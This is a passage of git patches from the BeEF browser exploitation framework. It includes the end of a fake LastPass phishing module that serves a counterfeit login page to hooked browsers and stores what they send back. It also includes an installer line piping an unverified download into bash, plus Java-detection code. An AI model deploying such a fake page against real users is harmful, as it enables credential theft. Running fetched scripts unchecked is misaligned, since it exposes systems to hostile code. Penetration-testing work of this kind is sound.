+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js','/lp/jquery','js')
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    if (@datastore['meta'] == "KILLFRAME") 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/index.html')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/indexFF.html')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/key_small.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/lpwhite_small.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/q3Jrp.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/screenkeyboard.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/xsmall.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/create_small.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/icon.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/jquery.js') 
+    end
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end
diff --git a/modules/social_engineering/fake_lastpass/q3Jrp.png b/modules/social_engineering/fake_lastpass/q3Jrp.png
new file mode 100644
index 0000000000000000000000000000000000000000..e04552e70460b5e82988ccaad4514a907f21e33a
GIT binary patch
literal 521
zcmV+k0`~ohP)<h;3K|Lk000e1NJLTq001BW001Ni00000&46b<0005dNkl<Z7#Rh@
zi*XxA6ac}^1bT~)c{6hm$TDHd<^1Dv_xia0x_z8#*cr!d-$BW=*8Ot1+%W`=$ILu5
z;7D7)E|<$MA;diP-m_Ijg~jD^!AuopW&=Q~t}lnLIPA3Q#nn$0L23Q|`S1P8&;*{}
z|Gr<9hpH?kK_wN5BojGZnuVsCWQPiziYw6$vIs%pFcNH`rXII_LohM?>$V>s)Ix}Q
z%<P9Mo@epcvmeMxRoFALO%=>Nd$zVPsF)c*HBDv)aFGIjdG)0zc<85BUg%QQe7=9)
zXF{p){QmjpH?cAm!AwX+IWujkrdfdql%Ue#%2Y*D6&2Aq(Zzk=&{S1F?)&yph9<1X
z%skGrvV8144@E6;?U}t*kwe)tv(d!N#mp#ZDKfJ$4;6KNdgUdhMt*tql?rCA=lkdT
zBvDnK@1MWV1S@mVVIh{uDF6_vtwc&l6GPNc&?O}tqN$}O94fj}5kKzx{$ZvfaohJp
zSz)M;nf<_uR39_*5SE78p1n6zM}m81?_!~bGBaRUB+MSFrIPXD%BOHD37=m1QkN3o
z^Zn=hDI|uR-+$hxxHME142wk4s#d0?il~UGVd5gQi~>znz{L0;h9JHrqDC0000000
LNkvXXu0mjf>bUml

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_lastpass/screenkeyboard.png b/modules/social_engineering/fake_lastpass/screenkeyboard.png
new file mode 100644
index 0000000000000000000000000000000000000000..7ae9705b9f538504ca619a16a04b712c76cab4df
GIT binary patch
literal 1181
zcmeAS@N?(olHy`uVBq!ia0vp^3LwnE1|*BCs=fdz$r9IylHmNblJdl&R0hYC{G?O`
z&)mfH)S%SFl*+=BsWuD@%qp275hW46K32*3xq68pHF_1f1wh>l3^w)^1&PVosU-?Y
zsp*+{wo31J?^jaDOtDo8H}y5}EpSfF$n>ZxN)4{^3rViZPPR-@vbR&PsjvbXkegbP
zs8ErclUHn2VXFi-*9yo63F|8<fR&VF+bTgE72zA8;GAESs$i;Tpqp%9W~g9hqGxDg
zU}<8hqhMrUXrOOsq;FuZYiM9)YHnp<r~m~@K--E^(yW49+@N*=dA3R!B_#z``ugSN
z<$C4Ddih1^`i7R4mih)p`bI{&Koz>hm3bwJ6}oxF$}kgLQj3#|G7CyF^YauyCMG83
zmzLNn0bL65LT&-v*t}wBFaZNhzap_f-%!s0<RzFwUtj!6b93RUi%Wu15$?rmaB)aw
zL8^XGYH@yPQ8F;%(v(3~6<9eJr6!i-7lq{K=fFZSAS1sdzc?emK*2fKRL@YsH!(Rg
z4<rKC;p=PVnO9trn3tUD>0+w{G(#^lGsViy(A3n(&BEBx*v;I~(AB`w$l1)&+`tSN
z>dvN47OpV8F8Rr&xv6<2Fuf@Vy(T#If)Yb+0nlcb)S}F?)D*X({9FaFr>!z^yTuTv
zc~HG6xZPreQ?EYIG5VmWMT%;e5HS6KnDB%P<iL}DY927X7XcIYzw@nT3=E9?o-U3d
z6}OW9{Qqx%*nvr{jghS<dRtB<{}NWV6aV;i6i&Z=`&P1|qT)r?=YDy63A?&K8Vr3*
zRndG*GBPp=vsfcPJUu<VWMfQBjLf;TgVXdfa_qgf9e&2pW}JTR!WGtg_wF^TOZQnN
zTwz?yCsBG}1+$y1!2`Yo#gO>RR~a`<<0`84ovy)PD)5pwp{&X20rQGdt|KbjpKo9k
zx;<6iK~dqy_xJH`8PNjr^BkHE_PWeqKh*TVq~PD5%9^%DD_u^97zJ%@Zv&PE3;x~Q
zoG#xmW5HraTV<zd_tVqT!~_Hd6AcUv6;J)%kWumH$47RB=m}SHI+z-!8NYb>vN1F0
qH}3+0$&)4>l0MX<ysw-`Ab}x2&`)#5)wsK$0>jhQ&t;ucLK6UsoQvWB

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_lastpass/xsmall.png b/modules/social_engineering/fake_lastpass/xsmall.png
new file mode 100644
index 0000000000000000000000000000000000000000..8446cace4981bd481b95fafc25be535df320cc3f
GIT binary patch
literal 1501
zcmeAS@N?(olHy`uVBq!ia0vp^Vj#@H1|*Mc$*~4fk|nMYCBgY=CFO}lsSJ)O`AMk?
zp1FzXsX?iUDV2pMQ*9U+m@_g%B1$5BeXNr6bM+EIYV;~{3xK*A7;Nk-3KEmEQ%e+*
zQqwc@Y?a>c-mj#PnPRIHZt82`Ti~3Uk?B!Ylp0*+7m{3+ootz+WN)WnQ(*-(AUCxn
zQK2F?C$HG5!d3}vt`(3C64qBz04piUwpD^SD#ABF!8yMuRl!uxKsVXI%uvD1M9<K~
zz|zE0N5ROz&_LhNNZ-I**U-Sq)ZEIzPyq^*fVLH-q*(>IxIyg#@@$ndN=gc>^!3Zj
z%k|2Q_413-^$jg8E%gnI^o@*kfhu&1EAvVcD|GXUm0>2hq!uR^WfqiV=I1GZOiWD5
zFD<cE0=g99h1>#PU%0_}#n6BP2AO_EVu8M)o`HUDF34YC)x{-2sR(CaRb3oXS&*t9
zlv<o$T9gcok2GbNW?<Oiw+N&V=o%~kqD)|<B<8r}Czs}?=9PH5*eU^K^incYtPGr;
z9SzN0-HZ&349qMH4K3UZ3>;kzjLqF#T@1_|U14Tm)9YqwZs}%b;^=7T>||)@YT#&K
z48n$v2F^xq&aQC1o_WP3iFwJXFncqB_Cobq;?-;AT$Gwvl3x^(pPvIu0Rb8LCHch}
z`2`Bj!KQkK3ciWSnRy@)Py|8z>ylcOS(cjOR+OKs01jcROe`)ia3kb%h~5-(LQNm&
z7=2LkKuRt!Az&H=G2w|H$bn~{)I4CGDFSAW4l(v63=B-%o-U3d6}Prr_4Nn|lsH!C
zzF5PUS<q{vuO3g+hJIJ)ZiPuLi+I$2O<2^btCTyvu{%uHsX%b*q>zrF6HnY`h<Uzr
z$_Ne+@ti5oBJ{4wiFfVC`VW$o)^n|AJ!rhob7$xCnV;`{E=+z|VwG-sOX~YXA2sLw
zq6zYS$>LrgnBzY(Y4)^QsR?zqK5)=JTsp_a@Y9+6-Gv<Dh1|A3-m*VobLxL2s+Zg?
zp0&EL{z5OGh^}Z2Pprn@{^ON=b8kq9?qTi^*wM6em0PifMceFUODt_%xYL*&<qMhD
zpWPZI^DjH}!Xt~MyrRj4{P_l5x6=gV3z(Ew<*i@0+r5yHInQ9{vzzP8555+87Ir+=
z<N?3kLbrv>3s0_ovf!6a-wvgKb*mq3jGo5zzq9;D)8-xhHS7IXHn|%s-;*)aWWUf|
zq`P{%MgKO3jAf$kYm@iy<ed9WF4%F}@5^RCs*m_OM|lbVy4P2hJMU(P-DI;0je^6~
zXaA-9UI~7?B{$<}=$}u&Y9=3jFeUsQ&pM4QVcAv8-yU?Ttq8rITisbGZPQU#d^jp3
zGvw{Ppq}g}%eO=qpIP?mjEu*(l57{%ZLj!eZ}PcNxAE-SDf=!&J}e8dT^3dlW^>py
zchQ5F*A@%8Pm_Fcs&2u_xpA*-{AOOxvhjXUJjZeFJ)QsiW-;YPEWLZs@8*)A<6D^9
kx1Md*-4>;Pxss8M;h98{)C-MuIiLd9)78&qol`;+0E=QHNB{r;

literal 0
HcmV?d00001


From 957510b6d95f0fa34bd6cf6e76be53ab4389e429 Mon Sep 17 00:00:00 2001
From: Philipp Hagemeister <phihag@phihag.de>
Date: Thu, 1 Aug 2013 17:18:17 +0200
Subject: [PATCH 353/397] Abort on error

On a (debian) system without sudo, lots of messages rush by, and it's not obvious was fails.
With this change, the log looks like:

    $ bash install-beef
    bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
    ======================================
               BeEF Installer
    ======================================

    CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environemnt and it's dependencies.

    In rare cases, this may lead to unexpected behaviour or package conflicts on some systems.

    Are you sure you wish to continue (Y/n)?

    Detecting OS..
    Debian/Ubuntu Detected
    Installing Prerequisite Packages..
    install-beef: line 74: sudo: command not found

which is far more informative.
---
 install-beef | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/install-beef b/install-beef
index a91892af9..295058d62 100644
--- a/install-beef
+++ b/install-beef
@@ -5,6 +5,8 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
+set -e
+
 clear
 echo "======================================"
 echo "          BeEF Installer   "

From 394875057169e8947629e87306ed588cebaf274b Mon Sep 17 00:00:00 2001
From: Philipp Hagemeister <phihag@phihag.de>
Date: Thu, 1 Aug 2013 17:33:09 +0200
Subject: [PATCH 354/397] Use a pipe instead of a fifo during installation

bash's anonymous fifos are only available if devfs is mounted.
On a system without /dev mounted (which is perfectly reasonable for a locked-down security testing machine), installing beef fails with (after applying #923)

    install-beef: line 81: /dev/fd/62: No such file or directory

This commit fixes and lets the installation run through.
---
 install-beef | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/install-beef b/install-beef
index a91892af9..642a7614c 100644
--- a/install-beef
+++ b/install-beef
@@ -76,7 +76,7 @@ if [ "$Distro" == "Debian" ]; then
 
 sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
 
-bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
 
 echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
 

From 402f4997df67b4f2feb0a1fac61a590ec0bdd1e5 Mon Sep 17 00:00:00 2001
From: Saafan <a.m.saafan@gmail.com>
Date: Sat, 3 Aug 2013 16:25:46 -0400
Subject: [PATCH 355/397] Fixing java support by separating Oracle deployement
 toolkit in a separate file. #786

---
 core/main/client/browser.js          |   63 +-
 core/main/client/lib/deployJava.js   | 1301 ++++++++++++++++++++++++++
 core/main/handlers/modules/beefjs.rb |    2 +-
 3 files changed, 1338 insertions(+), 28 deletions(-)
 create mode 100644 core/main/client/lib/deployJava.js

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 9b3e8fd9a..22010666c 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1298,7 +1298,14 @@ beef.browser = {
      * @example: if(beef.browser.javaEnabled()) { ... }
      */
     javaEnabled:function () {
-        return false;
+        //Use of deployJava defined in deployJava.js (Oracle java deployment toolkit)
+        versionJRE = deployJava.getJREs();
+
+        if(versionJRE != '')
+            return true;
+         else
+            return false;
+
     },
 
     /**
@@ -1342,33 +1349,35 @@ beef.browser = {
      */
     hasJava:function () {
 
-        // Check if Java is enabled
-        if (!beef.browser.javaEnabled()) {
-            return false;
-        }
+        return beef.browser.javaEnabled();
 
-        // This is a temporary fix as this does not work on Safari and Chrome
-        // Chrome requires manual user intervention even with unsigned applets.
-        // Safari requires a few seconds to load the applet.
-        if (beef.browser.isC() || beef.browser.isS()) {
-            return true;
-        }
-
-        // Inject an unsigned java applet to double check if the Java
-        // plugin is working fine.
-        try {
-            var applet_archive = 'http://' + beef.net.host + ':' + beef.net.port + '/demos/checkJava.jar';
-            var applet_id = 'checkJava';
-            var applet_name = 'checkJava';
-            var output;
-            beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava',
-                null, applet_archive, null);
-            output = document.Microsoft_Corporation.getInfo();
-            beef.dom.detachApplet('checkJava');
-            return output = 1;
-        } catch (e) {
-            return false;
-        }
+//        // Check if Java is enabled
+//        if (!beef.browser.javaEnabled()) {
+//            return false;
+//        }
+//
+//        // This is a temporary fix as this does not work on Safari and Chrome
+//        // Chrome requires manual user intervention even with unsigned applets.
+//        // Safari requires a few seconds to load the applet.
+//        if (beef.browser.isC() || beef.browser.isS()) {
+//            return true;
+//        }
+//
+//        // Inject an unsigned java applet to double check if the Java
+//        // plugin is working fine.
+//        try {
+//            var applet_archive = 'http://' + beef.net.host + ':' + beef.net.port + '/demos/checkJava.jar';
+//            var applet_id = 'checkJava';
+//            var applet_name = 'checkJava';
+//            var output;
+//            beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava',
+//                null, applet_archive, null);
+//            output = document.Microsoft_Corporation.getInfo();
+//            beef.dom.detachApplet('checkJava');
+//            return output = 1;
+//        } catch (e) {
+//            return false;
+//        }
     },
 
     /**
diff --git a/core/main/client/lib/deployJava.js b/core/main/client/lib/deployJava.js
new file mode 100644
index 000000000..80f34f6d2
--- /dev/null
+++ b/core/main/client/lib/deployJava.js
@@ -0,0 +1,1301 @@
+/*
+ * Copyright (c) 2006, 2012, Oracle and/or its affiliates. All rights reserved.
+ * ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ *   - Redistributions of source code must retain the above copyright
+ *     notice, this list of conditions and the following disclaimer.
+ *
+ *   - Redistributions in binary form must reproduce the above copyright
+ *     notice, this list of conditions and the following disclaimer in the
+ *     documentation and/or other materials provided with the distribution.
+ *
+ *   - Neither the name of Oracle nor the names of its
+ *     contributors may be used to endorse or promote products derived
+ *     from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
+ * IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
+ * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE COPYRIGHT OWNER OR
+ * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
+ * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+ * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
+ * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+ * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
+ * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+ * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+/*
+ * deployJava.js
+ *
+ * This file is part of the Deployment Toolkit.  It provides functions for web
+ * pages to detect the presence of a JRE, install the latest JRE, and easily run
+ * applets or Web Start programs.  More Information on usage of the
+ * Deployment Toolkit can be found in the Deployment Guide at:
+ * http://docs.oracle.com/javase/6/docs/technotes/guides/jweb/index.html
+ *
+ * The "live" copy of this file may be found at :
+ * http://java.com/js/deployJava.js.
+ * For web pages provisioned using https, you may want to access the copy at:
+ * https://java.com/js/deployJava.js.
+ *
+ * You are encouraged to link directly to the live copies.
+ * The above files are stripped of comments and whitespace for performance,
+ * You can access this file w/o the whitespace and comments removed at:
+ * http://java.com/js/deployJava.txt.
+ *
+ */
+
+var deployJava = function() {
+    /** HTML attribute filter implementation */
+    var hattrs = {
+        core: [ 'id', 'class', 'title', 'style' ],
+        i18n: [ 'lang', 'dir' ],
+        events: [ 'onclick', 'ondblclick', 'onmousedown', 'onmouseup',
+            'onmouseover', 'onmousemove', 'onmouseout', 'onkeypress',
+            'onkeydown', 'onkeyup' ],
+        applet: [ 'codebase', 'code', 'name', 'archive', 'object',
+            'width', 'height', 'alt', 'align', 'hspace', 'vspace' ],
+        object: [ 'classid', 'codebase', 'codetype', 'data', 'type',
+            'archive', 'declare', 'standby', 'height', 'width', 'usemap',
+            'name', 'tabindex', 'align', 'border', 'hspace', 'vspace' ]
+    };
+
+    var object_valid_attrs = hattrs.object.concat(hattrs.core, hattrs.i18n,
+        hattrs.events);
+    var applet_valid_attrs = hattrs.applet.concat(hattrs.core);
+
+    // generic log function, use console.log unless it isn't available
+    // then revert to alert()
+    function log(message) {
+        if ( ! rv.debug ) {return};
+
+        if (console.log) {
+            console.log(message);
+        } else {
+            alert(message);
+        }
+    }
+
+    //checks where given version string matches query
+    //
+    //NB: assume format is correct. Can add format check later if needed
+    // from dtjava.js
+    function versionCheckEx(query, version) {
+        if (query == null || query.length == 0) return true;
+
+        var c = query.charAt(query.length - 1);
+
+        //if it is not explicit pattern but does not have update version then need to append *
+        if (c != '+' && c != '*' && (query.indexOf('_') != -1 && c != '_')) {
+            query = query + "*";
+            c = '*';
+        }
+
+        query = query.substring(0, query.length - 1);
+        //if query ends with ".", "_" then we want to strip it to allow match of "1.6.*" to shorter form such as "1.6"
+        //TODO: add support for match of "1.7.0*" to "1.7"?
+        if (query.length > 0) {
+            var z = query.charAt(query.length - 1);
+            if (z == '.' || z == '_') {
+                query = query.substring(0, query.length - 1);
+            }
+        }
+        if (c == '*') {
+            //it is match if version starts from it
+            return (version.indexOf(query) == 0);
+        } else if (c == '+') {
+            //match if query string is lexicographically smaller
+            return query <= version;
+        }
+        return false;
+    }
+
+    function getWebStartLaunchIconURL() {
+        var imageUrl = '//java.com/js/webstart.png';
+        try {
+            // for http/https; use protocol less url; use http for all other protocol
+            return document.location.protocol.indexOf('http') != -1 ?
+                imageUrl : 'http:' + imageUrl;
+        } catch (err) {
+            return 'http:' + imageUrl;
+        }
+    }
+
+    // GetJava page
+    function constructGetJavaURL(query) {
+
+        var getJavaURL = 'http://java.com/dt-redirect';
+
+        if (query == null || query.length == 0) return getJavaURL;
+        if(query.charAt(0) == '&')
+        {
+            query = query.substring(1, query.length);
+        }
+        return getJavaURL + '?'+  query;
+    }
+
+    function arHas(ar, attr) {
+        var len = ar.length;
+        for (var i = 0; i < len; i++) {
+            if (ar[i] === attr) return true;
+        }
+        return false;
+    }
+
+    function isValidAppletAttr(attr) {
+        return arHas(applet_valid_attrs, attr.toLowerCase());
+    }
+
+    function isValidObjectAttr(attr) {
+        return arHas(object_valid_attrs, attr.toLowerCase());
+    }
+
+    /**
+     * returns true if we can enable DT plugin auto-install without chance of
+     * deadlock on cert mismatch dialog
+     *
+     * requestedJREVersion param is optional - if null, it will be
+     * treated as installing any JRE version
+     *
+     * DT plugin for 6uX only knows about JRE installer signed by SUN cert.
+     * If it encounter Oracle signed JRE installer, it will have chance of
+     * deadlock when running with IE.  This function is to guard against this.
+     */
+    function enableWithoutCertMisMatchWorkaround(requestedJREVersion) {
+
+        // Non-IE browser are okay
+        if ('MSIE' != deployJava.browserName) return true;
+
+        // if DT plugin is 10.0.0 or above, return true
+        // This is because they are aware of both SUN and Oracle signature and
+        // will not show cert mismatch dialog that might cause deadlock
+        if (deployJava.compareVersionToPattern(deployJava.getPlugin().version,
+            ["10", "0", "0"], false, true)) {
+            return true;
+        }
+
+        // If we got there, DT plugin is 6uX
+
+        if (requestedJREVersion  == null) {
+            // if requestedJREVersion is not defined - it means ANY.
+            // can not guarantee it is safe to install ANY version because 6uX
+            // DT does not know about Oracle certificates and may deadlock
+            return false;
+        }
+
+        // 6u32 or earlier JRE installer used Sun certificate
+        // 6u33+ uses Oracle's certificate
+        // DT in JRE6 does not know about Oracle certificate => can only
+        // install 6u32 or earlier without risk of deadlock
+        return !versionCheckEx("1.6.0_33+", requestedJREVersion);
+    }
+
+    /* HTML attribute filters */
+
+    var rv = {
+
+        debug: null,
+
+        /* version of deployJava.js */
+        version: "20120801",
+
+        firefoxJavaVersion: null,
+
+        myInterval: null,
+        preInstallJREList: null,
+        returnPage: null,
+        brand: null,
+        locale: null,
+        installType: null,
+
+        EAInstallEnabled: false,
+        EarlyAccessURL: null,
+
+
+        // mime-type of the DeployToolkit plugin object
+        oldMimeType: 'application/npruntime-scriptable-plugin;DeploymentToolkit',
+        mimeType: 'application/java-deployment-toolkit',
+
+        /* location of the Java Web Start launch button graphic is right next to
+         * deployJava.js at:
+         *    http://java.com/js/webstart.png
+         *
+         * Use protocol less url here for http/https support
+         */
+        launchButtonPNG: getWebStartLaunchIconURL(),
+
+        browserName: null,
+        browserName2: null,
+
+        /**
+         * Returns an array of currently-installed JRE version strings.
+         * Version strings are of the form #.#[.#[_#]], with the function returning
+         * as much version information as it can determine, from just family
+         * versions ("1.4.2", "1.5") through the full version ("1.5.0_06").
+         *
+         * Detection is done on a best-effort basis.  Under some circumstances
+         * only the highest installed JRE version will be detected, and
+         * JREs older than 1.4.2 will not always be detected.
+         */
+        getJREs: function() {
+            var list = new Array();
+            if (this.isPluginInstalled()) {
+                var plugin =  this.getPlugin();
+                var VMs = plugin.jvms;
+                for (var i = 0; i < VMs.getLength(); i++) {
+                    list[i] = VMs.get(i).version;
+                }
+            } else {
+                var browser = this.getBrowser();
+
+                if (browser == 'MSIE') {
+                    if (this.testUsingActiveX('1.7.0')) {
+                        list[0] = '1.7.0';
+                    } else if (this.testUsingActiveX('1.6.0')) {
+                        list[0] = '1.6.0';
+                    } else if (this.testUsingActiveX('1.5.0')) {
+                        list[0] = '1.5.0';
+                    } else if (this.testUsingActiveX('1.4.2')) {
+                        list[0] = '1.4.2';
+                    } else if (this.testForMSVM()) {
+                        list[0] = '1.1';
+                    }
+                } else if (browser == 'Netscape Family') {
+                    this.getJPIVersionUsingMimeType();
+                    if (this.firefoxJavaVersion != null) {
+                        list[0] = this.firefoxJavaVersion;
+                    } else if (this.testUsingMimeTypes('1.7')) {
+                        list[0] = '1.7.0';
+                    } else if (this.testUsingMimeTypes('1.6')) {
+                        list[0] = '1.6.0';
+                    } else if (this.testUsingMimeTypes('1.5')) {
+                        list[0] = '1.5.0';
+                    } else if (this.testUsingMimeTypes('1.4.2')) {
+                        list[0] = '1.4.2';
+                    } else if (this.browserName2 == 'Safari') {
+                        if (this.testUsingPluginsArray('1.7.0')) {
+                            list[0] = '1.7.0';
+                        } else if (this.testUsingPluginsArray('1.6')) {
+                            list[0] = '1.6.0';
+                        } else if (this.testUsingPluginsArray('1.5')) {
+                            list[0] = '1.5.0';
+                        } else if (this.testUsingPluginsArray('1.4.2')) {
+                            list[0] = '1.4.2';
+                        }
+                    }
+                }
+            }
+
+            if (this.debug) {
+                for (var i = 0; i < list.length; ++i) {
+                    log('[getJREs()] We claim to have detected Java SE ' + list[i]);
+                }
+            }
+
+            return list;
+        },
+
+        /**
+         * Triggers a JRE installation.  The exact effect of triggering an
+         * installation varies based on platform, browser, and if the
+         * Deployment Toolkit plugin is installed.
+         *
+         * The requestVersion string is of the form #[.#[.#[_#]]][+|*],
+         * which includes strings such as "1.4", "1.5.0*", and "1.6.0_02+".
+         * A star (*) means "any version starting within this family" and
+         * a plus (+) means "any version greater or equal to this".
+         * "1.5.0*" * matches 1.5.0_06 but not 1.6.0_01, whereas
+         * "1.5.0+" matches both.
+         *
+         * installCallback is an optional argument which holds a reference
+         * to a javascript callback function for reporting install status.
+         *
+         * If the Deployment Toolkit plugin is not present, this will just call
+         * this.installLatestJRE().
+         */
+        installJRE: function(requestVersion, installCallback) {
+            var ret = false;
+            if (this.isPluginInstalled() &&
+                this.isAutoInstallEnabled(requestVersion)) {
+                var installSucceeded = false;
+                if (this.isCallbackSupported()) {
+                    installSucceeded =
+                        this.getPlugin().installJRE(requestVersion, installCallback);
+                } else {
+                    installSucceeded = this.getPlugin().installJRE(requestVersion);
+                }
+
+                if (installSucceeded) {
+                    this.refresh();
+                    if (this.returnPage != null) {
+                        document.location = this.returnPage;
+                    }
+                }
+                return installSucceeded;
+            } else {
+                return this.installLatestJRE();
+            }
+        },
+
+        /**
+         * returns true if jre auto install for the requestedJREVersion is enabled
+         * for the local system; false otherwise
+         *
+         * requestedJREVersion param is optional - if not specified, it will be
+         * treated as installing any JRE version
+         *
+         * DT plugin for 6uX only knows about JRE installer signed by SUN cert.
+         * If it encounter Oracle signed JRE installer, it will have chance of
+         * deadlock when running with IE.  This function is to guard against this.
+         */
+        isAutoInstallEnabled: function(requestedJREVersion) {
+            // if no DT plugin, return false
+            if (!this.isPluginInstalled()) return false;
+
+            if (typeof requestedJREVersion  == 'undefined') {
+                requestedJREVersion = null;
+            }
+
+            return enableWithoutCertMisMatchWorkaround(requestedJREVersion);
+
+        },
+
+        /**
+         * returns true if jre install callback is supported
+         * callback support is added since dt plugin version 10.2.0 or above
+         */
+        isCallbackSupported: function() {
+            return this.isPluginInstalled() &&
+                this.compareVersionToPattern(this.getPlugin().version,
+                    ["10", "2", "0"], false, true);
+        },
+
+        /**
+         * Triggers a JRE installation.  The exact effect of triggering an
+         * installation varies based on platform, browser, and if the
+         * Deployment Toolkit plugin is installed.
+         *
+         * In the simplest case, the browser window will be redirected to the
+         * java.com JRE installation page, and (if possible) a redirect back to
+         * the current URL upon successful installation.  The return redirect is
+         * not always possible, as the JRE installation may require the browser to
+         * be restarted.
+         *
+         * installCallback is an optional argument which holds a reference
+         * to a javascript callback function for reporting install status.
+         *
+         * In the best case (when the Deployment Toolkit plugin is present), this
+         * function will immediately cause a progress dialog to be displayed
+         * as the JRE is downloaded and installed.
+         */
+        installLatestJRE: function(installCallback) {
+            if (this.isPluginInstalled() && this.isAutoInstallEnabled()) {
+                var installSucceeded = false;
+                if (this.isCallbackSupported()) {
+                    installSucceeded = this.getPlugin().installLatestJRE(installCallback);
+                } else {
+                    installSucceeded = this.getPlugin().installLatestJRE();
+                }
+                if (installSucceeded) {
+                    this.refresh();
+                    if (this.returnPage != null) {
+                        document.location = this.returnPage;
+                    }
+                }
+                return installSucceeded;
+            } else {
+                var browser = this.getBrowser();
+                var platform = navigator.platform.toLowerCase();
+                if ((this.EAInstallEnabled == 'true') &&
+                    (platform.indexOf('win') != -1) &&
+                    (this.EarlyAccessURL != null)) {
+
+                    this.preInstallJREList = this.getJREs();
+                    if (this.returnPage != null) {
+                        this.myInterval =
+                            setInterval("deployJava.poll()", 3000);
+                    }
+
+                    location.href = this.EarlyAccessURL;
+
+                    // we have to return false although there may be an install
+                    // in progress now, when complete it may go to return page
+                    return false;
+                } else {
+                    if (browser == 'MSIE') {
+                        return this.IEInstall();
+                    } else if ((browser == 'Netscape Family') &&
+                        (platform.indexOf('win32') != -1)) {
+                        return this.FFInstall();
+                    } else {
+                        location.href = constructGetJavaURL(
+                            ((this.returnPage != null) ?
+                                ('&returnPage=' + this.returnPage) : '') +
+                                ((this.locale != null) ?
+                                    ('&locale=' + this.locale) : '') +
+                                ((this.brand != null) ?
+                                    ('&brand=' + this.brand) : ''));
+                    }
+                    // we have to return false although there may be an install
+                    // in progress now, when complete it may go to return page
+                    return false;
+                }
+            }
+        },
+
+
+        /**
+         * Ensures that an appropriate JRE is installed and then runs an applet.
+         * minimumVersion is of the form #[.#[.#[_#]]], and is the minimum
+         * JRE version necessary to run this applet.  minimumVersion is optional,
+         * defaulting to the value "1.1" (which matches any JRE).
+         * If an equal or greater JRE is detected, runApplet() will call
+         * writeAppletTag(attributes, parameters) to output the applet tag,
+         * otherwise it will call installJRE(minimumVersion + '+').
+         *
+         * After installJRE() is called, the script will attempt to detect that the
+         * JRE installation has completed and begin running the applet, but there
+         * are circumstances (such as when the JRE installation requires a browser
+         * restart) when this cannot be fulfilled.
+         *
+         * As with writeAppletTag(), this function should only be called prior to
+         * the web page being completely rendered.  Note that version wildcards
+         * (star (*) and plus (+)) are not supported, and including them in the
+         * minimumVersion will result in an error message.
+         */
+        runApplet: function(attributes, parameters, minimumVersion) {
+            if (minimumVersion == 'undefined' || minimumVersion == null) {
+                minimumVersion = '1.1';
+            }
+
+            var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
+
+            var matchData = minimumVersion.match(regex);
+
+            if (this.returnPage == null) {
+                // if there is an install, come back here and run the applet
+                this.returnPage = document.location;
+            }
+
+            if (matchData != null) {
+                var browser = this.getBrowser();
+                if (browser != '?') {
+                    if (this.versionCheck(minimumVersion + '+')) {
+                        this.writeAppletTag(attributes, parameters);
+                    } else if (this.installJRE(minimumVersion + '+')) {
+                        // after successful install we need to refresh page to pick
+                        // pick up new plugin
+                        this.refresh();
+                        location.href = document.location;
+                        this.writeAppletTag(attributes, parameters);
+                    }
+                } else {
+                    // for unknown or Safari - just try to show applet
+                    this.writeAppletTag(attributes, parameters);
+                }
+            } else {
